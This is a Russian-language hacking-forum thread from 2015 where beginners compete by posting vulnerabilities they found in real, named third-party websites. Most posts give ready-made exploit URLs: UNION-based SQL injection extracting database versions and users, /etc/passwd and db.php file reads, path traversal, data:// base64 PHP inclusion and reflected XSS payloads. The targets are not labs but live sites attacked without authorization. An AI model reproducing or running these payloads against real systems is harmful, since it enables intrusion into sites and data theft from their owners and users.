Конкурс уязвимостей для новичков

Discussion in 'Песочница' started by yarbabin, 1 Jun 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    PHP:
    http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,version()
    Автор, скажите пожалуйста версию, и где вывод
     
  2. Neon2211

    Neon2211 New Member

    Joined:
    15 Jun 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Кстати не одну из уезвимостей не брал на этом сайте http://pastebin.com/
    Искал через софт !
     
  3. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Вывод в исходном коде.
    Code:
    http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,44444444444
    Нажимаем ctrl+f и ищем 4444444
    Нашли на 473 строке
    Code:
    http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,version()
    выдает нам на 473 строке
    Code:
    <SCRIPT language=JavaScript>var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';
     
    _________________________
    yarbabin likes this.
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    Вы же не автор. вывод подключаемой картинке срц=вывод . Мне просто иногда кажется что...
     
  5. Neon2211

    Neon2211 New Member

    Joined:
    15 Jun 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Сайт:http://www.cqtailian.com/
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20select%20999,2,3,4,5
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    а вот тут вывода нет.
     
    _________________________
  7. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
  8. artificer

    artificer New Member

    Joined:
    17 Jun 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Сайт:http:www.brzozo.com
    Уязвимость:Local File Reading
    Эксплойт:
    Code:
    http://www.brzozo.com/force-download.php?file=/etc/passwd
    http://www.brzozo.com/force-download.php?file=db.php
    http://www.brzozo.com/popup.php
    http://www.brzozo.com/popup.php?id=1
    Так принимается?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    принимается, однако в гугле уже эта уязвимость есть, а касаемо повторов есть правило
     
    _________________________
  10. Neon2211

    Neon2211 New Member

    Joined:
    15 Jun 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Сайт:www.stateofemergencyltd.com
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.stateofemergencyltd.com/news.php?id=999999.9 union all select 1,[t],3,4,5,6,7

    Сайт:www.upani.com
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.upani.com/productinfo.php?pid=85' and [t] and '1'='1&cid=5&psid=rajpur-collection-invitation-box
    Cайт:www.corpsport.com
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.corpsport.com/productDetails.php?id=999999.9 union all select 1,[t],3,4,5
    Cайт:www.immobilien-niederzier.com
    Уязвимость:SQLi
    Эксплойт:
    Code:
    http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,[t]
     
  11. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    всем добавил. sqli из паблика не зачтены.
     
    _________________________
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    для тех, кто уже прошел (на данный момент это только @3nvY). предлагаю повысить свой скилл, найдя все уязвимости из списка. это шанс проявить себя и разобраться с основным типом уязвимостей.
     
    _________________________
  14. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    46
    Likes Received:
    19
    Reputations:
    11
    Сайт: hfboapps.ucr.edu
    Уязвимость: LFI
    Эксплойт:
    Code:
    http://fboapps.ucr.edu/policies/index.php?path=/etc/passwd
    Сайт: www.gamsc.com
    Уязвимость: LFI
    Эксплойт:
    Code:
    http://www.gamsc.com/index.php?filename=../../../../../../../etc/passwd
    Сайт: www.mycklaflon.se
    Уязвимость: RFI
    Эксплойт:
    Code:
    www.mycklaflon.se/index1.asp?page=http://www.vk.com
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    не RFI, но IFRAME Injection
     
    _________________________
  16. semen6192

    semen6192 New Member

    Joined:
    9 Jun 2015
    Messages:
    24
    Likes Received:
    3
    Reputations:
    2
    1)Сайт: http://www.felixfilm.se/film.php?id=77
    Уязвимость: SQLi
    Эксплойт: http://www.felixfilm.se/film.php?id=-77 UNION SELECT 1,version(),3,user(),5,6,7,8,9,10 --

    2)Сайт: http://prontowash.com/usa/location.php?id=2
    Уязвимость: SQLi
    Эксплойт: http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--

    3)Сайт: http://www.comtecwash.com/photos.php?id=1
    Уязвимость: SQLi
    Эксплойт: http://www.comtecwash.com/photos.php?id=-1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10--

    4)Сайт: http://odessa-life.od.ua
    Уязвимость: XSS
    Эксплойт: http://odessa-life.od.ua/gue/search
    P.S В поиске: <script>alert('1')</script>

    5)Сайт: http://mapexpert.com.ua/index_ru.php?id=67&table=news
    Уязвимость: SQLi
    Эксплойт: http://mapexpert.com.ua/index_ru.php?id=-67+union+select+1,2,version(),4,5,6,7,8,9,10+--+&table=news
    P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем <script>alert('antichat.ru')</script>

    6)Сайт: http://prokudin-gorskiy.ru
    Уязвимость: XSS
    Эксплойт: http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=<script>alert('antichat.ru')</script>
     
    #36 semen6192, 25 Jun 2015
    Last edited: 27 Jun 2015
  17. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    46
    Likes Received:
    19
    Reputations:
    11
    Сайт: www.walkandtrain.com
    Уязвимость: RFI
    Эксплоит:
    Code:
    http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
    Сайт: railusers.net
    Уязвимость: RFI
    Эксплоит:
    Code:
    http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D
    Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти.
     
    #37 3nvY, 28 Jun 2015
    Last edited: 28 Jun 2015
    KIR@PRO and <Cyber-punk> like this.
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    да тут ничего особенного. просто чтение локальных файлов. в php это readfile, file_get_contents и т. д. никаких особых фишек там нет, разве что некоторые функции поддерживают нуль-байт
     
    _________________________
  19. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    46
    Likes Received:
    19
    Reputations:
    11
    То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий :p
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    887
    Reputations:
    363
    ответ на вопрос. но да, это RFI :)
     
    _________________________
Loading...